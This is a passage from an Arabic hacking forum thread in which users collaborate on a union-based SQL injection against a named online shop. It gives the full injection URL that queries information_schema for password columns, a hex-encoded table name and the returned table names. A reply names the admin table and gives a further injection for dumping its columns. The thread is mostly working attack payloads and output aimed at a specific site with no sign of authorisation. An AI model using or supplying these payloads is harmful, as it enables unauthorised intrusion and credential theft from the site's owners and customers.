 |
اقتباس |
 |
|
|
 |
 المشاركة الأصلية كتبت بواسطة Masaru |
 |
|
|
|
|
|
|
|
|
عدد الاعمده المصابه 4
كود PHP:
UNION SELECT 1,2,3,4
العامود المصاب 4
أصدار القاعده 5
كتبت الاستغلال كامل
كود PHP:
http://www.shopmbtnice.com/article.php?id=-1 UNION SELECT 1,2,3,concat(table_Name,0x3a,column_Name,0x3a,table_schema),5+From+information_schema.columns+Where+column_name+like+CHAR(37, 112, 97, 115, 37)--
طلع لي
كود PHP:
tb_account:password:shopmbtnice
أضفت على الاستغلال السابق كلمت Group
الناتج
كود PHP:
tb_account:password:shopmbtnice
tb_email:password:shopmbtnice
أخذت هذي الكلمه (tb_account) وشفرتها في موقع التشفير
وكتبت
كود PHP:
where+table_Name=0x74625f6163636f756e74
بدل أستعلام جدول الباس
طلع الناتج
كود PHP:
tb_account:id:shopmbtnice
أنا ألي هنا وقفت ما عرفت أكمل
وأحنى هنا على شان نتعلم من بعض
والي قدر يحقن الموقع يقلي أذا كان عندي خطأ ولا لا
بالتوفيق للجميع
|
|
 |
|
 |
|
أجل صحيح لاكن هدا tb_account جدول الأعضاء
هدا هو جدول الأدمن tb_admin
من بعد ما شفرت ضع أمر group_ ليطلع لك جميع الأعمدة
من بعد ستصبح الحقنة هكدا
http://www.shopmbtnice.com/article.p...rom+tb_admin--
بالتوفيق